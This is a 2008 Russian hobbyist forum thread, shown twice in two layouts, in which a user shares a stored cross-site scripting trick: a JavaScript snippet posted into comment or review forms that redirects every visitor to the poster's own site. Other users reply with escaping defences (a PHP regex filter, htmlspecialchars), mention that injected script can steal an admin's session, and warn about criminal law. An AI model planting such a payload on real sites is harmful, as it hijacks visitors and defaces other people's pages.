Это хакерство?

BleSSeD · 05.05.2008, 20:34

гггг,есть 1 прикол.Работает он конечно-же не везде,н оесть сайты,где ето проходит.Надо чтобь было что-то типа "прокоментировать фотку",или "написать отзыв" ... А там пишем что небудь типа по теме,а потом вставляэм ето:

<script language='javascript'>
var1=71;
var2=var1;
if(var1==var2) document.location="ввв.адрес.вашего .сайтаl";
</script>

И тогда на ту страницу больше никто не попадет,а все будут к вам ити)) Если админы плохие,то не скоро поймут что к чему.как вам ето?

ivan341 · 05.05.2008, 21:00

vov4yk, Угу ... только 80% сайтов в наше время имеют защиту. < на < и т.д.

BleSSeD · 05.05.2008, 21:07

Но есть еще 20%,на которых можно ето делать.Ето 2 сайта из 10.нормально

Цитата:

Сообщение от ivan341

< на < и т.д.

А как они ету защиту дедают?

GLUK · 05.05.2008, 21:34

Dcc` сообщение переписывается в другую кодировку и эти символы браузем рассматриваются как символы.

ivan341 · 06.05.2008, 00:12

vov4yk, Самый простой способ str или preg.

Пример из мануала php

PHP код:


			


$search = array ("'<script[^>]*?>.*?</script>'si",  // Вырезает javaScript

                 "'<[\/\!]*?[^<>]*?>'si",           // Вырезает HTML-теги

                 "'([\r\n])[\s]+'",                 // Вырезает пробельные символы

                 "'&(quot|#34);'i",                 // Заменяет HTML-сущности

                 "'&(amp|#38);'i",

                 "'&(lt|#60);'i",

                 "'&(gt|#62);'i",

                 "'&(nbsp|#160);'i",

                 "'&(iexcl|#161);'i",

                 "'&(cent|#162);'i",

                 "'&(pound|#163);'i",

                 "'&(copy|#169);'i",

                 "'&#(\d+);'e");                    // интерпретировать как php-код



$replace = array ("",

                  "",

                  "\\1",

                  "\"",

                  "&",

                  "<",

                  ">",

                  " ",

                  chr(161),

                  chr(162),

                  chr(163),

                  chr(169),

                  "chr(\\1)");



$text = preg_replace($search, $replace, $document);

kost · 06.05.2008, 01:47

Самый простой способ -- это htmlspecialchars.

VictorS · 06.05.2008, 03:08

Цитата:

Сообщение от vov4yk

гггг,есть 1 прикол.Работает он конечно-же не везде,н оесть сайты,где ето проходит.Надо чтобь было что-то типа "прокоментировать фотку",или "написать отзыв" ... А там пишем что небудь типа по теме,а потом вставляэм ето:

<script language='javascript'>
var1=71;
var2=var1;
if(var1==var2) document.location="ввв.адрес.вашего .сайтаl";
</script>

И тогда на ту страницу больше никто не попадет,а все будут к вам ити)) Если админы плохие,то не скоро поймут что к чему.как вам ето?

Люди часами бьются, что бы например найти уязвимость позволяющую вставить в текст форума html-код, ав в идеале javascript.
Раньше это можно было сделать использую спаренные bb-коды (а на не обновленных версиях phpBB и сейчас вполне можно), на предыдущих версиях IPB защита была, но можно было вставить javascript в жалобу (тогда этот скрипт выполнялся у модератора) да и спаренные BB-коды помнится прокатывали, ну и т.п.
Смысл в том, что яваскриптом можно украсть сессию админа и с этой сессией наделать делов. Но это все не хакерство... так - баловство

P.S. А еще я знаю (могу рассказать) как вообще ничего не взламывая дефейсить любой сайт с фреймами, но это больше для шуток над знакомыми веб-мастерами подходит

Newfelix · 06.05.2008, 10:52

Это вы этим удивить кого-то хотели? ))
Способов боловства для "хаккеров" кучи...
Если заинтересовались, качайте книги по безопасности, благо их навалом...

З.Ы. Только перед использование, Уголовный кодекс РФ (и не только) полезно бы прочесть;-)

Nielson · 06.05.2008, 12:31

Это ламерство.

Асмодиан · 06.05.2008, 12:52

я бы предложил в первом примере заменить ввв.адрес.вашего .сайтаl на ввв.порносайта или можно на ввв.кремля, ввв.белого.дома или чтото подобное. Так хоть весело людям будет...

05.05.2008, 20:34	#1
BleSSeD	гггг,есть 1 прикол.Работает он конечно-же не везде,н оесть сайты,где ето проходит.Надо чтобь было что-то типа "прокоментировать фотку",или "написать отзыв" ... А там пишем что небудь типа по теме,а потом вставляэм ето: <script language='javascript'> var1=71; var2=var1; if(var1==var2) document.location="ввв.адрес.вашего .сайтаl"; </script> И тогда на ту страницу больше никто не попадет,а все будут к вам ити)) Если админы плохие,то не скоро поймут что к чему.как вам ето?

05.05.2008, 21:00	#2
ivan341	vov4yk, Угу ... только 80% сайтов в наше время имеют защиту. < на < и т.д.

05.05.2008, 21:34	#4
GLUK	Dcc` сообщение переписывается в другую кодировку и эти символы браузем рассматриваются как символы.

06.05.2008, 00:12	#5
ivan341	vov4yk, Самый простой способ str или preg. Пример из мануала php PHP код: $search = array ("'<script[^>]?>.?</script>'si", // Вырезает javaScript "'<[\/\!]?[^<>]?>'si", // Вырезает HTML-теги "'([\r\n])[\s]+'", // Вырезает пробельные символы "'&(quot\|#34);'i", // Заменяет HTML-сущности "'&(amp\|#38);'i", "'&(lt\|#60);'i", "'&(gt\|#62);'i", "'&(nbsp\|#160);'i", "'&(iexcl\|#161);'i", "'&(cent\|#162);'i", "'&(pound\|#163);'i", "'&(copy\|#169);'i", "'&#(\d+);'e"); // интерпретировать как php-код $replace = array ("", "", "\\1", "\"", "&", "<", ">", " ", chr(161), chr(162), chr(163), chr(169), "chr(\\1)"); $text = preg_replace($search, $replace, $document);

06.05.2008, 01:47	#6
kost	Самый простой способ -- это htmlspecialchars.

06.05.2008, 10:52	#8
Newfelix	Это вы этим удивить кого-то хотели? )) Способов боловства для "хаккеров" кучи... Если заинтересовались, качайте книги по безопасности, благо их навалом... З.Ы. Только перед использование, Уголовный кодекс РФ (и не только) полезно бы прочесть;-)

06.05.2008, 12:52	#10
Асмодиан	я бы предложил в первом примере заменить ввв.адрес.вашего .сайтаl на ввв.порносайта или можно на ввв.кремля, ввв.белого.дома или чтото подобное. Так хоть весело людям будет...